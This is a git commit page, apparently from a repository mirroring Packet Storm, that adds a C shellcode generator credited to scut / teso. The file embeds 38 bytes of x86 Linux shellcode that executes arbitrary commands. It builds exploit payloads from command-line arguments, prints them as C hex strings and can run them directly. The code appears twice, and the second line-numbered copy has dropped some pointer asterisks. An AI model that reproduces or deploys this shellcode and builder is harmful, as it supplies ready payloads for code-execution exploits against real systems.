packetstorm sync

author: SkyperTHC 2026-03-03 06:28:55 +0000
committer: SkyperTHC 2026-03-03 06:28:55 +0000
commit: 5d3573ef7a109ee70416fe94db098fe6a769a798 (patch)
tree: dc2d5b294c9db8ab2db7433511f94e1c4bb8b698 /other/shellgen/shellxp.c
parent: c6c59dc73cc4586357f93ab38ecf459e98675cc5 (diff)
1 files changed, 130 insertions, 0 deletions
diff --git a/other/shellgen/shellxp.c b/other/shellgen/shellxp.c
new file mode 100644
index 0000000..4d5916b
--- /dev/null
+++ b/other/shellgen/shellxp.c
@@ -0,0 +1,130 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <ctype.h>
+#include <string.h>
+/* 38 byte x86/linux PIC arbitrary execute shellcode - scut / teso
+ */
+unsigned char   shellcode[] =
+        "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
+        "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
+        "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
+        "\xff\xff";
+static int      sc_build (unsigned char *target, size_t target_len,
+        unsigned char *shellcode, char **argv);
+void    hexdump (unsigned char *cbegin, unsigned char *cend);
+static int
+sc_build (unsigned char *target, size_t target_len, unsigned char *shellcode,
+        char **argv)
+{
+        int     i;
+        size_t  tl_orig = target_len;
+        if (strlen (shellcode) >= (target_len - 1))
+                return (-1);
+        memcpy (target, shellcode, strlen (shellcode));
+        target += strlen (shellcode);
+        target_len -= strlen (shellcode);
+        for (i = 0 ; argv[i] != NULL ; ++i)
+                ;
+        /* set argument count
+         */
+        target[0] = (unsigned char) i;
+        target++;
+        target_len--;
+        for ( ; i > 0 ; ) {
+                i -= 1;
+                if (strlen (argv[i]) >= target_len)
+                        return (-1);
+                printf ("[%3d/%3d] adding (%2d): %s\n",
+                        (tl_orig - target_len), tl_orig,
+                        strlen (argv[i]), argv[i]);
+                memcpy (target, argv[i], strlen (argv[i]));
+                target += strlen (argv[i]);
+                target_len -= strlen (argv[i]);
+                target[0] = (unsigned char) (i + 1);
+                target++;
+                target_len -= 1;
+        }
+        return (tl_orig - target_len);
+}
+void
+hexdump (unsigned char *cbegin, unsigned char *cend)
+{
+        int             i;
+        unsigned char * buf = cbegin;
+        printf ("/* %d byte shellcode */\n", cend - cbegin);
+        printf ("\"");
+        for (i = 0 ; buf < cend; ++buf) {
+                printf ("\\x%02x", *buf & 0xff);
+                if (++i >= 12) {
+                        i = 0;
+                        printf ("\"\n\"");
+                }
+        }
+        printf ("\";\n\n");
+}
+int
+main (int argc, char *argv[])
+{
+        int             n;
+        unsigned char   tbuf[2048];
+        void            (* tbuf_f)(void) = (void *) tbuf;
+        printf ("build exploit shellcode\n");
+        printf ("-scut / teso.\n\n");
+        if (argc < 2) {
+                printf ("usage: %s [exec] commands ...\n\n",
+                        argv[0]);
+                exit (EXIT_FAILURE);
+        }
+        printf ("constructing shellcode...\n\n");
+        memset (tbuf, '\x00', sizeof (tbuf));
+        if (strcmp (argv[1], "exec") == 0)
+                n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[2]);
+        else
+                n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[1]);
+        if (n == -1) {
+                printf ("failed to build it.\n");
+                exit (EXIT_FAILURE);
+        }
+        printf ("shellcode size: %d bytes\n\n", n);
+        hexdump (tbuf, tbuf + n);
+        if (strcmp (argv[1], "exec") == 0)
+                tbuf_f ();
+        exit (EXIT_SUCCESS);
+}
author	SkyperTHC	2026-03-03 06:28:55 +0000
committer	SkyperTHC	2026-03-03 06:28:55 +0000
commit	5d3573ef7a109ee70416fe94db098fe6a769a798 (patch)
tree	dc2d5b294c9db8ab2db7433511f94e1c4bb8b698 /other/shellgen/shellxp.c
parent	c6c59dc73cc4586357f93ab38ecf459e98675cc5 (diff)

diff --git a/other/shellgen/shellxp.c b/other/shellgen/shellxp.c new file mode 100644 index 0000000..4d5916b --- /dev/null +++ b/other/shellgen/shellxp.c
@@ -0,0 +1,130 @@
	1
	2	#include <stdio.h>
	3	#include <stdlib.h>
	4	#include <unistd.h>
	5	#include <ctype.h>
	6	#include <string.h>
	7
	8
	9	/* 38 byte x86/linux PIC arbitrary execute shellcode - scut / teso
	10	*/
	11	unsigned char shellcode[] =
	12	"\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07"
	13	"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b"
	14	"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff"
	15	"\xff\xff";
	16
	17	static int sc_build (unsigned char *target, size_t target_len,
	18	unsigned char shellcode, char *argv);
	19
	20	void hexdump (unsigned char cbegin, unsigned char cend);
	21
	22
	23	static int
	24	sc_build (unsigned char target, size_t target_len, unsigned char shellcode,
	25	char **argv)
	26	{
	27	int i;
	28	size_t tl_orig = target_len;
	29
	30
	31	if (strlen (shellcode) >= (target_len - 1))
	32	return (-1);
	33
	34	memcpy (target, shellcode, strlen (shellcode));
	35	target += strlen (shellcode);
	36	target_len -= strlen (shellcode);
	37
	38	for (i = 0 ; argv[i] != NULL ; ++i)
	39	;
	40
	41	/* set argument count
	42	*/
	43	target[0] = (unsigned char) i;
	44	target++;
	45	target_len--;
	46
	47	for ( ; i > 0 ; ) {
	48	i -= 1;
	49
	50	if (strlen (argv[i]) >= target_len)
	51	return (-1);
	52
	53	printf ("[%3d/%3d] adding (%2d): %s\n",
	54	(tl_orig - target_len), tl_orig,
	55	strlen (argv[i]), argv[i]);
	56
	57	memcpy (target, argv[i], strlen (argv[i]));
	58	target += strlen (argv[i]);
	59	target_len -= strlen (argv[i]);
	60
	61	target[0] = (unsigned char) (i + 1);
	62	target++;
	63	target_len -= 1;
	64	}
	65
	66	return (tl_orig - target_len);
	67	}
	68
	69
	70	void
	71	hexdump (unsigned char cbegin, unsigned char cend)
	72	{
	73	int i;
	74	unsigned char * buf = cbegin;
	75
	76
	77	printf ("/* %d byte shellcode */\n", cend - cbegin);
	78	printf ("\"");
	79
	80	for (i = 0 ; buf < cend; ++buf) {
	81
	82	printf ("\\x%02x", *buf & 0xff);
	83
	84	if (++i >= 12) {
	85	i = 0;
	86	printf ("\"\n\"");
	87	}
	88	}
	89	printf ("\";\n\n");
	90	}
	91
	92
	93	int
	94	main (int argc, char *argv[])
	95	{
	96	int n;
	97	unsigned char tbuf[2048];
	98	void (* tbuf_f)(void) = (void *) tbuf;
	99
	100
	101	printf ("build exploit shellcode\n");
	102	printf ("-scut / teso.\n\n");
	103
	104	if (argc < 2) {
	105	printf ("usage: %s [exec] commands ...\n\n",
	106	argv[0]);
	107
	108	exit (EXIT_FAILURE);
	109	}
	110
	111	printf ("constructing shellcode...\n\n");
	112	memset (tbuf, '\x00', sizeof (tbuf));
	113	if (strcmp (argv[1], "exec") == 0)
	114	n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[2]);
	115	else
	116	n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[1]);
	117	if (n == -1) {
	118	printf ("failed to build it.\n");
	119	exit (EXIT_FAILURE);
	120	}
	121
	122	printf ("shellcode size: %d bytes\n\n", n);
	123	hexdump (tbuf, tbuf + n);
	124
	125	if (strcmp (argv[1], "exec") == 0)
	126	tbuf_f ();
	127
	128	exit (EXIT_SUCCESS);
	129	}
	130